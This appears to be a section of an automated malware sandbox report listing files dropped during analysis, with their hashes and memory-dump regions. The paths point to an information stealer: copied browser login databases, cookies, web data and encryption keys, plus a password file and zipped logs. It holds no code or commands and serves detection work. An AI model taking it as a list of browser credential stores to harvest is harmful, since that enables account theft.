| MD5 | 56d4fcfa7eb3a84740081264c5c0f10a |
| SHA1 | 06edf5464d2cfe1a75f3600c9039eabab97248bd |
| SHA256 | 5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e |
| SHA512 | df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609 |
memory/1384-11-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\password.txt
| MD5 | 6a0e721cb89a06736206b91af92239cd |
| SHA1 | bb87db8bbcb512a584c45c80504fc21a0a972b3a |
| SHA256 | a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015 |
| SHA512 | c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c |
memory/1384-18-0x0000000180000000-0x0000000180127000-memory.dmp
C:\Users\Admin\AppData\Local\net
| MD5 | de9438683614ccf3f0316139418985a9 |
| SHA1 | dcbbfb18c16f4bf9025233e6ecf42be64c33932d |
| SHA256 | d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b |
| SHA512 | 925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470 |
memory/1384-22-0x0000000180000000-0x0000000180127000-memory.dmp
memory/1384-21-0x0000000180000000-0x0000000180127000-memory.dmp
C:\Users\Admin\AppData\Local\micro.log
| MD5 | 311a2c063514a94a873bf8c7486547d8 |
| SHA1 | 69305cc09546c3a0230d3d1ba87620766a442399 |
| SHA256 | eb83ccc9c9a14d52b8115f7e1da82097968cc8a5082f4031ccd0306538e42317 |
| SHA512 | 26d76d75f1d4cd9113e7eb8e2681f0b5ecdbad336e5e50569acbf80b13b79b65e07f8a1a7afe489a27e49c9d94e45c93727b5e7e7bd1a3b9e8b702203bd4fccd |
memory/2888-40-0x0000014DE9410000-0x0000014DE9432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rgnp30tx.ord.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2888-50-0x0000014DEB940000-0x0000014DEB952000-memory.dmp
memory/2888-51-0x0000014DE9560000-0x0000014DE956A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Cookies
| MD5 | 6e86b6f358f5d778881937294b43ac24 |
| SHA1 | 0b0de45f33ab9ee86fef84756bb7c5be8320702d |
| SHA256 | 19ed915b2701b0b3c5353db7dd045c126145584368bbdc33f3b9462280bf53fa |
| SHA512 | dc524cfaf9c652f4ffb26feaa15b7ff60cc0b63ec70d3d7539b6472af70807b70a74378cb178fca4c54d9806249477dcaf5bde909f150b031f8907a8edd45726 |
C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Login Data
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_Default_Web Data
| MD5 | ab87d892a202f83f7e925c5e294069e8 |
| SHA1 | 0b86361ff41417a38ce3f5b5250bb6ecd166a6a1 |
| SHA256 | bdc61a1c60fe8c08fe7a5256e9c8d7ad1ba4dd0963a54357c484256fc8834130 |
| SHA512 | f9a03eaae52d7fb544047fea3ffa7d8c6f7debdbb907348adfc46545e7b6c3783427983f16885ae138e43e51eec6ce73520c38581e4d9bb7140beeae2137de41 |
C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\cc_key
| MD5 | f470520743c3b6a01a4d7a0affbef2a4 |
| SHA1 | 4318fb899fe1f21dfa6238ad25bcd2c3ec530d6b |
| SHA256 | 7d6fb14e76439291eb51c2c4df36cad871f430c94eabdff9759b5e094999b2ae |
| SHA512 | 981cfc2557a3d0016a996ff00ba1a73ab054543e01b1ec8856df5d4e683bbc7001d1925a9ff42b60d5cd3765d3316044ae73b51ce8b605d85820904c2bad317b |
C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Cookies
| MD5 | 49693267e0adbcd119f9f5e02adf3a80 |
| SHA1 | 3ba3d7f89b8ad195ca82c92737e960e1f2b349df |
| SHA256 | d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f |
| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Login Data
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_Default_Web Data
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Temp\nsv7CB3.tmp\ee_key
| MD5 | ab65b1a23524d73575e80dcbcf4b58b4 |
| SHA1 | eacf19cbda987f244512aba07376f4b10e6bbfa5 |
| SHA256 | d1791ebbb7a4954bbfd0a25226f1e2eac0a0d259b2a05eaa7cec64055b7f73e7 |
| SHA512 | 8f3ba48bb83d1a0f42c9c546635b4128addc41d605cd9ed0f3ef5af6672452aad16651742755fded03f6439265738189d11f7405a62d790e5260a427de11df1f |
C:\Users\Admin\AppData\Local\notepad.log
| MD5 | 6199c9d0ad1df4105c85ae041e833a0e |
| SHA1 | c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1 |
| SHA256 | c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4 |
| SHA512 | b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3 |
memory/1384-71-0x0000000180000000-0x0000000180032000-memory.dmp
C:\Users\Admin\AppData\Local\micro.log.zip
| MD5 | 149b2845d7cf4b695ad3a39975e216fc |
| SHA1 | 8137272305952a0d769349b1f70dcc4b1a7e43d1 |
| SHA256 | d81d7ef894a6b2d3386401f3842d0e403c01b2685a93eb815c2a78af1ff3b2d1 |
| SHA512 | 5623d4a58f2064a8cb39d24722f3134219e551c93a2517eb8860750002f1df528f55849b078061c6a70ad34bf5d79afaad0af4e84e5b2ebfa65f438697a5c46f |
memory/1652-91-0x00000000003B0000-0x00000000003CF000-memory.dmp
memory/1384-93-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp
\??\c:\users\admin\appdata\local\netlist.log
| MD5 | 4557beea354d237448c61e02a2c7bd17 |
| SHA1 | 877ba42bb43b02936d59ece114ed3ff33e906d96 |
| SHA256 | a725edb0ddde5d58c2206ef49009b3349935e0cd4cab37a3a3bc5c714afe9eff |
| SHA512 | 80f0f55b8108ba7efa7245e6a89f6a62c863626cc18d8b8c6b462f14e23816af5f2161366d2e8bc5542df6382658fdabaa17ed0b2bc39d9216e982acc2356421 |
\??\c:\users\admin\appdata\local\netlist.log
| MD5 | 8f173962e10757f55ee5fb261e380f57 |
| SHA1 | 4866b8eaf8820f3538b482b5dc8940426fc4cfa1 |
| SHA256 | af4e210293aad43094841bdaeb2cba8fd4efc8daf6f447acfc0d2851bb92673e |
| SHA512 | be0eec3fa227dab33ab3a910fd9b89736f527533102f4c3e1012bf1dffc11e1d8df9c84a8d960c78271f3e2c0b0519c4d51128bfc3eafec6df85126c5617a2cf |
\??\c:\users\admin\appdata\local\netlist.log
| MD5 | f3b90ce6c87b9de5edcdac1ac9b4c36f |
| SHA1 | d41bcfeb2877e2520940820d17d690fef51b9b96 |
| SHA256 | 385710e0b834abd20940156db5008e1657fcaaef344c143366a5252383531019 |
| SHA512 | 72ee5fe1070078ff1b786a61ea3986bd5119a98d78f533727a1a39b78cd8d77edd456c8a47ab3b469b4b3c2c6f7bfccd18a4195289d47a191051cf6a743b9c2c |
memory/1384-118-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp
memory/1384-119-0x00007FFBF5DB0000-0x00007FFBF5DCF000-memory.dmp